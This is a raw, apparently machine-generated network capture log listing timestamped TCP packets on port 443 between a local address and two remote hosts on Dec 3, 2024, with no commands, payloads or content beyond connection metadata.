                                                                                                                      Dec 3, 2024 08:55:52.900438070 CET4435008113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.905061007 CET50094443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.905119896 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.905214071 CET50094443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.905436993 CET50094443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:52.905448914 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.976574898 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.976933002 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.976946115 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.977240086 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.977536917 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:52.977588892 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:52.977679014 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.023328066 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.066406012 CET4435008613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.069596052 CET50086443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.069622993 CET4435008613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.070116043 CET50086443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.070122004 CET4435008613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.129977942 CET4435008313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.133677959 CET4435008313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.133776903 CET50083443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.133837938 CET50083443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.133853912 CET4435008313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.133862972 CET50083443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.133867979 CET4435008313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.137557983 CET50095443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.137609959 CET4435009513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.137700081 CET50095443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.137857914 CET50095443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.137873888 CET4435009513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.226735115 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.227058887 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.227089882 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.228059053 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.228135109 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.228688955 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.228740931 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.228853941 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.228862047 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.275249958 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.303735971 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.304124117 CET50087443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.304141998 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.304506063 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.304816008 CET50087443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.304919004 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.304975986 CET50087443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.347332001 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.369561911 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.369596004 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.369704008 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.369807005 CET50082443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.387461901 CET50082443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.387499094 CET44350082196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.429143906 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.429790020 CET50089443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.429816008 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.430311918 CET50089443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.430316925 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.510595083 CET4435008613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.513711929 CET4435008613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.513777018 CET50086443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.513818979 CET50086443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.513827085 CET4435008613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.513839960 CET50086443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.513844013 CET4435008613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.516865969 CET50096443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.516891003 CET4435009613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.516961098 CET50096443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.517115116 CET50096443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.517122984 CET4435009613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.522134066 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.522423029 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.522454977 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.522761106 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.523055077 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.523107052 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.523199081 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.567327023 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.602205038 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.602226973 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.602233887 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.602299929 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.602312088 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.605226040 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.605285883 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.605292082 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.605300903 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.605334997 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.605534077 CET50084443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.605547905 CET44350084196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.605963945 CET50097443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.606002092 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.606060982 CET50097443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.606571913 CET50097443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.606579065 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.809302092 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.809325933 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.809408903 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.809416056 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.853729963 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:53.883435965 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.887377024 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.887412071 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.887456894 CET50089443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.887501001 CET50089443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.887574911 CET50089443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.887587070 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.887605906 CET50089443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.887609959 CET4435008913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.890620947 CET50098443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.890634060 CET4435009813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:53.890696049 CET50098443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.890857935 CET50098443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:53.890868902 CET4435009813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.043646097 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.043657064 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.043705940 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.043745995 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.043756962 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.043768883 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.043803930 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.044516087 CET50085443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.044522047 CET44350085196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.061235905 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.061259985 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.061295033 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.061434984 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.061470985 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.061517000 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.062088013 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.062117100 CET44350088196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.062166929 CET50088443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.062463045 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.062485933 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.062549114 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.063009977 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.063019991 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.084276915 CET50100443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.084306002 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.084381104 CET50100443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.084645033 CET50100443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.084657907 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.301309109 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.301335096 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.301403999 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.301424026 CET50087443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.301470041 CET50087443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.302985907 CET50087443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.303006887 CET44350087196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.336513996 CET4435009113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.337126017 CET50091443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.337162971 CET4435009113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.337728977 CET50091443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.337733984 CET4435009113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.421509981 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.421535015 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.421586990 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.421642065 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.421653986 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.421681881 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.421694040 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.422775984 CET50090443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.422808886 CET44350090196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.518260956 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.518542051 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.518556118 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.518877983 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.519165039 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.519212961 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.519346952 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.567329884 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.600929976 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.602169037 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.602196932 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.602550030 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.604806900 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.604872942 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.605269909 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:54.647340059 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.781471014 CET4435009113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.784776926 CET4435009113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.784990072 CET50091443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.797055006 CET50091443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.797077894 CET4435009113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.797090054 CET50091443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.797096014 CET4435009113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.829385042 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.844556093 CET50094443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.844588995 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.847970009 CET50094443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.847980976 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.850893974 CET50101443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.850929022 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.850991964 CET50101443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.857115030 CET50101443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.857127905 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.859150887 CET4435009513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.867007971 CET50095443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.867047071 CET4435009513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:54.873223066 CET50095443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:54.873231888 CET4435009513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.277065039 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.280133963 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.280184031 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.280181885 CET50094443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.280236006 CET50094443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.280299902 CET50094443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.280316114 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.280328989 CET50094443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.280333996 CET4435009413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.283853054 CET50102443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.283899069 CET4435010213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.283967972 CET50102443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.284414053 CET50102443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.284432888 CET4435010213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.293910027 CET4435009513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.297009945 CET4435009513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.297063112 CET50095443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.297142982 CET50095443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.297158003 CET4435009513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.297171116 CET50095443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.297178030 CET4435009513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.299285889 CET4435009613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.300223112 CET50096443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.300242901 CET4435009613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.300812960 CET50103443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.300831079 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.300884008 CET50103443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.301280022 CET50096443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.301285028 CET4435009613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.301330090 CET50103443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.301342010 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.355328083 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.355568886 CET50097443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.355581999 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.355925083 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.356215000 CET50097443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.356272936 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.356352091 CET50097443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.365067959 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.365091085 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.365151882 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.365163088 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.373445034 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.373507977 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.373512983 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.374252081 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.374273062 CET44350092196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.374322891 CET50092443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.403331041 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.428713083 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.428734064 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.428790092 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.428803921 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.428848028 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.429645061 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.429673910 CET44350093196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.429723978 CET50093443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.670290947 CET4435009813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.670867920 CET50098443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.670897961 CET4435009813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.671365976 CET50098443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.671370983 CET4435009813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.744198084 CET4435009613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.747322083 CET4435009613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.747488976 CET50096443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.747488976 CET50096443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.747488976 CET50096443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.750633955 CET50104443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.750660896 CET4435010413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.750744104 CET50104443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.750919104 CET50104443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:55.750931978 CET4435010413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.938040972 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.938384056 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.938400984 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.938703060 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.939003944 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.939060926 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.939167023 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.943686008 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.943881989 CET50100443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.943906069 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.944268942 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.944541931 CET50100443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.944607973 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.944638968 CET50100443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:55.983333111 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.991336107 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:55.994659901 CET50100443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:56.065457106 CET50096443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:56.065470934 CET4435009613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.114020109 CET4435009813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.114618063 CET4435009813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.114700079 CET50098443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:56.114918947 CET50098443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:56.114918947 CET50098443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:56.114926100 CET4435009813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.114933968 CET4435009813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.117970943 CET50105443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:56.118010044 CET4435010513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.118079901 CET50105443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:56.118242025 CET50105443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:56.118254900 CET4435010513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.200530052 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.200562954 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.200627089 CET50097443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:56.200647116 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.200678110 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.200727940 CET50097443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:56.201808929 CET50097443192.168.2.4196.22.142.143
